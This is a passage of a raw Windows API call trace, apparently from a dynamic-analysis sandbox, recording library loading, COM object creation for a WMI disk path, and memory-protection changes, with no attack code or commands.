out: pbstr=0x6ed0ac*="kernel32") returned 1 [0082.034] CharLowerBuffW (in: lpsz="kernel32", cchLength=0x8 | out: lpsz="kernel32") returned 0x8 [0082.034] GetModuleHandleW (lpModuleName="kernel32") returned 0x76d30000 [0082.036] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringEx") returned 0x76dc47f1 [0082.037] GetProcAddress (hModule=0x76620000, lpProcName="IIDFromString") returned 0x76632ff2 [0082.038] IIDFromString (in: lpsz="{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}", lpiid=0x6ed194 | out: lpiid=0x6ed194) returned 0x0 [0082.039] GetProcAddress (hModule=0x76620000, lpProcName="CoGetClassObject") returned 0x766554ad [0082.039] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6ecea8 | out: ppv=0x6ecea8*=0x6010810) returned 0x0 [0082.039] GetCurrentThreadId () returned 0xb0c [0082.039] ResetEvent (hEvent=0xb8) returned 1 [0082.039] GetCurrentThreadId () returned 0xb0c [0082.039] GetCurrentThreadId () returned 0xb0c [0082.039] GetCurrentThreadId () returned 0xb0c [0082.039] GetCurrentThreadId () returned 0xb0c [0082.039] ResetEvent (hEvent=0xb8) returned 1 [0082.039] GetCurrentThreadId () returned 0xb0c [0082.039] GetCurrentThreadId () returned 0xb0c [0082.039] SetEvent (hEvent=0xbc) returned 1 [0082.039] SetEvent (hEvent=0xb8) returned 1 [0082.039] CloseHandle (hObject=0x290) returned 1 [0082.611] GetCurrentThreadId () returned 0xb0c [0082.611] ResetEvent (hEvent=0xb8) returned 1 [0082.611] GetCurrentThreadId () returned 0xb0c [0082.611] GetCurrentThreadId () returned 0xb0c [0082.611] GetCurrentThreadId () returned 0xb0c [0082.611] GetCurrentThreadId () returned 0xb0c [0082.611] ResetEvent (hEvent=0xb8) returned 1 [0082.612] GetCurrentThreadId () returned 0xb0c [0082.612] GetCurrentThreadId () returned 0xb0c [0082.612] SetEvent (hEvent=0xbc) returned 1 [0082.612] SetEvent (hEvent=0xb8) returned 1 [0082.612] CloseHandle (hObject=0x2a0) returned 1 [0083.406] SysReAllocStringLen (in: pbstr=0x6eb9f8*=0x0, psz="API-MS-Win-Core-LocalRegistry-L1-1-0.dll", len=0x28 | out: pbstr=0x6eb9f8*="API-MS-Win-Core-LocalRegistry-L1-1-0.dll") returned 1 [0083.406] CharLowerBuffW (in: lpsz="API-MS-Win-Core-LocalRegistry-L1-1-0.dll", cchLength=0x28 | out: lpsz="api-ms-win-core-localregistry-l1-1-0.dll") returned 0x28 [0083.407] LoadLibraryExW (lpLibFileName="API-MS-Win-Core-LocalRegistry-L1-1-0.dll", hFile=0x0, dwFlags=0x8) returned 0x76d30000 [0083.407] GetLastError () returned 0x0 [0083.410] GetProcAddress (hModule=0x76d30000, lpProcName="RegCreateKeyExW") returned 0x76d4865b [0083.413] GetProcAddress (hModule=0x76d30000, lpProcName="RegQueryValueExW") returned 0x76d41f4e [0083.418] GetProcAddress (hModule=0x76d30000, lpProcName="RegCloseKey") returned 0x76d4209f [0083.419] SysReAllocStringLen (in: pbstr=0x6eba74*=0x0, psz="ntdll.dll", len=0x9 | out: pbstr=0x6eba74*="ntdll.dll") returned 1 [0083.419] CharLowerBuffW (in: lpsz="ntdll.dll", cchLength=0x9 | out: lpsz="ntdll.dll") returned 0x9 [0083.419] GetModuleHandleW (lpModuleName="ntdll.dll") returned 0x77c40000 [0083.419] GetProcAddress (hModule=0x77c40000, lpProcName="EtwRegisterTraceGuidsW") returned 0x77c7f843 [0083.420] WbemDefPath:IUnknown:QueryInterface (in: This=0x6010810, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6ed0c0 | out: ppvObject=0x6ed0c0*=0x0) returned 0x80004002 [0083.420] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6010810, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ed0d4 | out: ppvObject=0x6ed0d4*=0x6010820) returned 0x0 [0083.420] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0x22c1ad4, cbMultiByte=9, lpWideCharStr=0x6ebe18, cchWideChar=2047 | out: lpWideCharStr="ole32.dll") returned 9 [0083.421] SysReAllocStringLen (in: pbstr=0x6ece1c*=0x0, psz="ole32.dll", len=0x9 | out: pbstr=0x6ece1c*="ole32.dll") returned 1 [0083.421] CharLowerBuffW (in: lpsz="ole32.dll", cchLength=0x9 | out: lpsz="ole32.dll") returned 0x9 [0083.421] LoadLibraryExA (lpLibFileName="ole32.dll", hFile=0x0, dwFlags=0x0) returned 0x76620000 [0083.421] GetLastError () returned 0x0 [0083.421] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ece08*=0x766214a0, NumberOfBytesToProtect=0x6ece0c, NewAccessProtection=0x4, OldAccessProtection=0x6ece40 | out: BaseAddress=0x6ece08*=0x76621000, NumberOfBytesToProtect=0x6ece0c, OldAccessProtection=0x6ece40*=0x20) returned 0x0 [0083.422] GetCurrentProcess () returned 0xffffffff [0083.422] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ece08*=0x766214a0, NumberOfBytesToProtect=0x6ece0c, NewAccessProtection=0x20, OldAccessProtection=0x6ece40 | out: BaseAddress=0x6ece08*=0x76621000, NumberOfBytesToProtect=0x6ece0c, OldAccessProtection=0x6ece40*=0x4) returned 0x0 [0083.422] GetCurrentProcess () returned 0xffffffff [0083.422] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ece08*=0x766214b0, NumberOfBytesToProtect=0x6ece0c, NewAccessProtection=0x4, OldAccessProtection=0x6ece40 | out: BaseAddress=0x6ece08*=0x76621000, NumberOfBytesToProtect=0x6ece0c, OldAccessProtection=0x6ece40*=0x20) returned 0x0 [0083.422] GetCurrentProcess () returned 0xffffffff [0083.422] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ece08*=0x766214b0, NumberOfBytesToProtect=0x6ece0c, NewAccessProtection=0x20, OldAccessProtection=0x6ece40 | out: BaseAddress=0x6ece08*=0x76621000, NumberOfBytesToProtect=0x6ece0c, OldAccessProtection=0x6ece40*=0x4) returned 0x0 [0083.423] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ece08*=0x766219a8, NumberOfBytesToProtect=0x6ece0c, NewAccessProtection=0x4, OldAccessProtection=0x6ece40 | out: BaseAddress=0x6ece08*=0x76621000, NumberOfBytesToProtect=0x6ece0c, OldAccessProtection=0x6ece40*=0x20) returned 0x0 [0083.423] GetCurrentProcess () returned 0xffffffff [0083.423] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ece08*=0x766219a8, NumberOfBytesToProtect=0x6ece0c, NewAccessProtection=0x20, OldAccessProtection=0x6ece40 | out: BaseAddress=0x6ece08*=0x76621000, NumberOfBytesToProtect=0x6ece0c, OldAccessProtection=0x6ece40*=0x4) returned 0x0 [0083.423] GetCurrentProcess () returned 0xffffffff [0083.423] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ece08*=0x766219ac, NumberOfBytesToProtect=0x6ece0c, NewAccessProtection=0x4, OldAccessProtection=0x6ece40 | out: BaseAddress=0x6ece08*=0x76621000, NumberOfBytesToProtect=0x6ece0c, OldAccessProtection=0x6ece40*=0x20) returned 0x0 [0083.423] GetCurrentProcess () returned 0xffffffff [0083.423] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ece08*=0x766219ac, NumberOfBytesToProtect=0x6ece0c, NewAccessProtection=0x20, OldAccessProtection=0x6ece40 | out: BaseAddress=0x6ece08*=0x76621000, NumberOfBytesToProtect=0x6ece0c, OldAccessProtection=0x6ece40*=0x4) returned 0x0 [0083.424] GetCurrentProcess () returned 0xffffffff [0083.424] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ece08*=0x76621a00, NumberOfBytesToProtect=0x6ece0c, NewAccessProtection=0x4, OldAccessProtection=0x6ece40 | out: BaseAddress=0x6ece08*=0x76621000, NumberOfBytesToProtect=0x6ece0c, OldAccessProtection=0x6ece40*=0x20) returned 0x0 [0083.424] GetCurrentProcess () returned 0xffffffff [0083.424] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ece08*=0x76621a00, NumberOfBytesToProtect=0x6ece0c, NewAccessProtection=0x20, OldAccessProtection=0x6ece40 | out: BaseAddress=0x6ece08*=0x76621000, NumberOfBytesToProtect=0x6ece0c, OldAccessProtection=0x6ece40*=0x4) returned 0x0 [0083.425] GetProcAddress (hModule=0x76620000, lpProcName="CoCreateFreeThreadedMarshaler") returned 0x7663e452 [0083.425] WbemDefPath:IUnknown:Release (This=0x6010810) returned 0x0 [0083.425] WbemDefPath:IUnknown:QueryInterface (in: This=0x6010820, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6eccf4 | out: ppvObject=0x6eccf4*=0x6010820) returned 0x0 [0083.426] WbemDefPath:IUnknown:QueryInterface (in: This=0x6010820, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6eccb0 | out: ppvObject=0x6eccb0*=0x0) returned 0x80004002 [0083.427] WbemDefPath:IUnknown:AddRef (This=0x6010820) returned 0x3 [0083.427] WbemDefPath:IUnknown:QueryInterface (in: This=0x6010820, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6ec60c | out: ppvObject=0x6ec60c*=0x0) returned 0x80004002 [0083.427] WbemDefPath:IUnknown:QueryInterface (in: This=0x6010820, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6ec5bc | out: ppvObject=0x6ec5bc*=0x0) returned 0x80004002 [0083.427] WbemDefPath:IUnknown:QueryInterface (in: This=0x6010820, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ec5c8 | out: ppvObject=0x6ec5c8*=0xb6f5f0) returned 0x0 [0083.427] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0xb6f5f0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6ec5d0 | out: pCid=0x6ec5d0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0083.427] WbemDefPath:IUnknown:Release (This=0xb6f5f0) returned 0x3 [0083.427] GetProcAddress (hModule=0x76620000, lpProcName="CoGetContextToken") returned 0x7665ecab [0083.427] CoGetContextToken (in: pToken=0x6ec628 | out: pToken=0x6ec628) returned 0x0 [0083.428] CoGetContextToken (in: pToken=0x6eca30 | out: pToken=0x6eca30) returned 0x0 [0083.428] WbemDefPath:IUnknown:QueryInterface (in: This=0x6010820, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ecac0 | out: ppvObject=0x6ecac0*=0x0) returned 0x80004002 [0083.428] WbemDefPath:IUnknown:Release (This=0x6010820) returned 0x2 [0083.428] WbemDefPath:IUnknown:Release (This=0x6010820) returned 0x1 [0083.428] CoGetContextToken (in: pToken=0x6ed3b8 | out: pToken=0x6ed3b8) returned 0x0 [0083.428] CoGetContextToken (in: pToken=0x6ed318 | out: pToken=0x6ed318) returned 0x0 [0083.428] WbemDefPath:IUnknown:QueryInterface (in: This=0x6010820, riid=0x6ed3e8*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x6ed3e4 | out: ppvObject=0x6ed3e4*=0x6010820) returned 0x0 [0083.428] WbemDefPath:IUnknown:AddRef (This=0x6010820) returned 0x3 [0083.428] WbemDefPath:IUnknown:Release (This=0x6010820) returned 0x2 [0083.432] WbemDefPath:IWbemPath:SetText (This=0x6010820, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0083.432] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0x22c1ad4, cbMultiByte=12, lpWideCharStr=0x6ec39c, cchWideChar=2047 | out: lpWideCharStr="OLEAUT32.dll㾑矊쏔n춐n诔癶") returned 12 [0083.433] SysReAllocStringLen (in: pbstr=0x6ed3a0*=0x0, psz="OLEAUT32.dll", len=0xc | out: pbstr=0x6ed3a0*="OLEAUT32.dll") returned 1 [0083.433] CharLowerBuffW (in: lpsz="OLEAUT32.dll", cchLength=0xc | out: lpsz="oleaut32.dll") returned 0xc [0083.433] LoadLibraryExA (lpLibFileName="OLEAUT32.dll", hFile=0x0, dwFlags=0x0) returned 0x76e40000 [0083.433] GetLastError () returned 0x0 [0083.433] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ed38c*=0x76e41238, NumberOfBytesToProtect=0x6ed390, NewAccessProtection=0x4, OldAccessProtection=0x6ed3c4 | out: BaseAddress=0x6ed38c*=0x76e41000, NumberOfBytesToProtect=0x6ed390, OldAccessProtection=0x6ed3c4*=0x20) returned 0x0 [0083.434] GetCurrentProcess () returned 0xffffffff [0083.434] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ed38c*=0x76e41238, NumberOfBytesToProtect=0x6ed390, NewAccessProtection=0x20, OldAccessProtection=0x6ed3c4 | out: BaseAddress=0x6ed38c*=0x76e41000, NumberOfBytesToProtect=0x6ed390, OldAccessProtection=0x6ed3c4*=0x4) returned 0x0 [0083.434] GetCurrentProcess () returned 0xffffffff [0083.434] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ed38c*=0x76e41258, NumberOfBytesToProtect=0x6ed390, NewAccessProtection=0x4, OldAccessProtection=0x6ed3c4 | out: BaseAddress=0x6ed38c*=0x76e41000, NumberOfBytesToProtect=0x6ed390, OldAccessProtection=0x6ed3c4*=0x20) returned 0x0 [0083.434] GetCurrentProcess () returned 0xffffffff [0083.434] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ed38c*=0x76e41258, NumberOfBytesToProtect=0x6ed390, NewAccessProtection=0x20, OldAccessProtection=0x6ed3c4 | out: BaseAddress=0x6ed38c*=0x76e41000, NumberOfBytesToProtect=0x6ed390, OldAccessProtection=0x6ed3c4*=0x4) returned 0x0 [0083.434] GetCurrentProcess () returned 0xffffffff [0083.434] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ed38c*=0x76e41260, NumberOfBytesToProtect=0x6ed390, NewAccessProtection=0x4, OldAccessProtection=0x6ed3c4 | out: BaseAddress=0x6ed38c*=0x76e41000, NumberOfBytesToProtect=0x6ed390, OldAccessProtection=0x6ed3c4*=0x20) returned 0x0 [0083.435] GetCurrentProcess () returned 0xffffffff [0083.435] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ed38c*=0x76e41260, NumberOfBytesToProtect=0x6ed390, NewAccessProtection=0x20, OldAccessProtection=0x6ed3c4 | out: BaseAddress=0x6ed38c*=0x76e41000, NumberOfBytesToProtect=0x6ed390, OldAccessProtection=0x6ed3c4*=0x4) returned 0x0 [0083.435] GetCurrentProcess () returned 0xffffffff [0083.435] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ed38c*=0x76e41268, NumberOfBytesToProtect=0x6ed390, NewAccessProtection=0x4, OldAccessProtection=0x6ed3c4 | out: BaseAddress=0x6ed38c*=0x76e41000, NumberOfBytesToProtect=0x6ed390, OldAccessProtection=0x6ed3c4*=0x20) returned 0x0 [0083.435] GetCurrentProcess () returned 0xffffffff [0083.435] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ed38c*=0x76e41268, NumberOfBytesToProtect=0x6ed390, NewAccessProtection=0x20, OldAccessProtection=0x6ed3c4 | out: BaseAddress=0x6ed38c*=0x76e41000, NumberOfBytesToProtect=0x6ed390, OldAccessProtection=0x6ed3c4*=0x4) returned 0x0 [0083.435] GetCurrentProcess () returned 0xffffffff [0083.435] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ed38c*=0x76e412c4, NumberOfBytesToProtect=0x6ed390, NewAccessProtection=0x4, OldAccessProtection=0x6ed3c4 | out: BaseAddress=0x6ed38c*=0x76e41000, NumberOfBytesToProtect=0x6ed390, OldAccessProtection=0x6ed3c4*=0x20) returned 0x0 [0083.436] GetCurrentProcess () returned 0xffffffff [0083.436] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ed38c*=0x76e412c4, NumberOfBytesToProtect=0x6ed390, NewAccessProtection=0x20, OldAccessProtection=0x6ed3c4 | out: BaseAddress=0x6ed38c*=0x76e41000, NumberOfBytesToProtect=0x6ed390, OldAccessProtection=0x6ed3c4*=0x4) returned 0x0 [0083.436] GetCurrentProcess () returned 0xffffffff [0083.436] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ed38c*=0x76e412cc, NumberOfBytesToProtect=0x6ed390, NewAccessProtection=0x4, OldAccessProtection=0x6ed3c4 | out: BaseAddress=0x6ed38c*=0x76e41000, NumberOfBytesToProtect=0x6ed390, OldAccessProtection=0x6ed3c4*=0x20) returned 0x0 [0083.436] GetCurrentProcess () returned 0xffffffff [0083.436] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ed38c*=0x76e412cc, NumberOfBytesToProtect=0x6ed390, NewAccessProtection=0x20, OldAccessProtection=0x6ed3c4 | out: BaseAddress=0x6ed38c*=0x76e41000, NumberOfBytesToProtect=0x6ed390, OldAccessProtection=0x6ed3c4*=0x4) returned 0x0 [0083.437] GetCurrentProcess () returned 0xffffffff [0083.437] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ed38c*=0x76e41300, NumberOfBytesToProtect=0x6ed390, NewAccessProtection=0x4, OldAccessProtection=0x6ed3c4 | out: BaseAddress=0x6ed38c*=0x76e41000, NumberOfBytesToProtect=0x6ed390, OldAccessProtection=0x6ed3c4*=0x20) returned 0x0 [0083.437] GetCurrentProcess () returned 0xffffffff [0083.437] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ed38c*=0x76e41300, NumberOfBytesToProtect=0x6ed390, NewAccessProtection=0x20, OldAccessProtection=0x6ed3c4 | out: BaseAddress=0x6ed38c*=0x76e41000, NumberOfBytesToProtect=0x6ed390, OldAccessProtection=0x6ed3c4*=0x4) returned 0x0 [0083.437] GetCurrentProcess () returned 0xffffffff [0083.437] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ed38c*=0x76e41308, NumberOfBytesToProtect=0x6ed390, NewAccessProtection=0x4, OldAccessProtection=0x6ed3c4 | out: BaseAddress=0x6ed38c*=0x76e41000, NumberOfBytesToProtect=0x6ed390, OldAccessProtection=0x6ed3c4*=0x20) returned 0x0 [0083.437] GetCurrentProcess () returned 0xffffffff [0083.437] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ed38c*=0x76e41308, NumberOfBytesToProtect=0x6ed390, NewAccessProtection=0x20, OldAccessProtection=0x6ed3c4 | out: BaseAddress=0x6ed38c*=0x76e41000, NumberOfBytesToProtect=0x6ed390, OldAccessProtection=0x6ed3c4*=0x4) returned 0x0 [0083.438] GetCurrentProcess () returned 0xffffffff [0083.438] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ed38c*=0x76e4132c, NumberOfBytesToProtect=0x6ed390, NewAccessProtection=0x4, OldAccessProtection=0x6ed3c4 | out: BaseAddress=0x6ed38c*=0x76e41000, NumberOfBytesToProtect=0x6ed390, OldAccessProtection=0x6ed3c4*=0x20) returned 0x0 [0083.438] GetCurrentProcess () returned 0xffffffff [0083.438] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ed38c*=0x76e4132c, NumberOfBytesToProtect=0x6ed390, NewAccessProtection=0x20, OldAccessProtection=0x6ed3c4 | out: BaseAddress=0x6ed38c*=0x76e41000, NumberOfBytesToProtect=0x6ed390, OldAccessProtection=0x6ed3c4*=0x4) returned 0x0 [0083.438] GetCurrentProcess () returned 0xffffffff [0083.438] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ed38c*=0x76e41390, NumberOfBytesToProtect=0x6ed390, NewAccessProtection=0x4, OldAccessProtection=0x6ed3c4 | out: BaseAddress=0x6ed38c*=0x76e41000, NumberOfBytesToProtect=0x6ed390, OldAccessProtection=0x6ed3c4*=0x20) returned 0x0 [0083.438] GetCurrentProcess () returned 0xffffffff [0083.439] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ed38c*=0x76e41390, NumberOfBytesToProtect=0x6ed390, NewAccessProtection=0x20, OldAccessProtection=0x6ed3c4 | out: BaseAddress=0x6ed38c*=0x76e41000, NumberOfBytesToProtect=0x6ed390, OldAccessProtection=0x6ed3c4*=0x4) returned 0x0 [0083.439] GetProcAddress (hModule=0x76e40000, lpProcName=0x2) returned 0x76e44642 [0083.440] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6010820, puCount=0x6ed56c | out: puCount=0x6ed56c*=0x0) returned 0x0 [0083.440] WbemDefPath:IWbemPath:GetText (in: This=0x6010820, lFlags=2, puBuffLength=0x6ed568*=0x0, pszText=0x0 | out: puBuffLength=0x6ed568*=0x20, pszText=0x0) returned 0x0 [0083.441] GetProcAddress (hModule=0x76e40000, lpProcName=0x6) returned 0x76e43e59 [0083.441] WbemDefPath:IWbemPath:GetText (in: This=0x6010820, lFlags=2, puBuffLength=0x6ed568*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6ed568*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0083.441] WbemDefPath:IWbemPath:GetInfo (in: This=0x6010820, uRequestedInfo=0x0, puResponse=0x6ed574 | out: puResponse=0x6ed574*=0xc19) returned 0x0 [0083.441] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6010820, puCount=0x6ed56c | out: puCount=0x6ed56c*=0x0) returned 0x0 [0083.441] WbemDefPath:IWbemPath:GetInfo (in: This=0x6010820, uRequestedInfo=0x0, puResponse=0x6ed574 | out: puResponse=0x6ed574*=0xc19) returned 0x0 [0083.442] WbemDefPath:IWbemPath:GetInfo (in: This=0x6010820, uRequestedInfo=0x0, puResponse=0x6ed574 | out: puResponse=0x6ed574*=0xc19) returned 0x0 [0083.445] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6010820, puCount=0x6ed4ec | out: puCount=0x6ed4ec*=0x0) returned 0x0 [0083.447] CoGetObjectContext (in: riid=0x34e26c8*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6ecda0 | out: ppv=0x6ecda0*=0xb51e34) returned 0x0 [0083.447] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x6ecd98 | out: pAptType=0x6ecd98*=1) returned 0x0 [0083.447] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34e26b0*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6ecd9c | out: ppvObject=0x6ecd9c*=0x0) returned 0x80004002 [0083.447] IUnknown:Release (This=0xb51e34) returned 0x0 [0083.448] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6ec708 | out: ppv=0x6ec708*=0x6010900) returned 0x0 [0083.448] WbemDefPath:IUnknown:QueryInterface (in: This=0x6010900, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6ec920 | out: ppvObject=0x6ec920*=0x0) returned 0x80004002 [0083.448] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6010900, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ec934 | out: ppvObject=0x6ec934*=0x60109c0) returned 0x0 [0083.448] WbemDefPath:IUnknown:Release (This=0x6010900) returned 0x0 [0083.448] WbemDefPath:IUnknown:QueryInterface (in: This=0x60109c0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ec554 | out: ppvObject=0x6ec554*=0x60109c0) returned 0x0 [0083.448] WbemDefPath:IUnknown:QueryInterface (in: This=0x60109c0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6ec510 | out: ppvObject=0x6ec510*=0x0) returned 0x80004002 [0083.448] WbemDefPath:IUnknown:AddRef (This=0x60109c0) returned 0x3 [0083.448] WbemDefPath:IUnknown:QueryInterface (in: This=0x60109c0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6ebe6c | out: ppvObject=0x6ebe6c*=0x0) returned 0x80004002 [0083.448] WbemDefPath:IUnknown:QueryInterface (in: This=0x60109c0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6ebe1c | out: ppvObject=0x6ebe1c*=0x0) returned 0x80004002 [0083.449] WbemDefPath:IUnknown:QueryInterface (in: This=0x60109c0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ebe28 | out: ppvObject=0x6ebe28*=0xb6f610) returned 0x0 [0083.449] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0xb6f610, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6ebe30 | out: 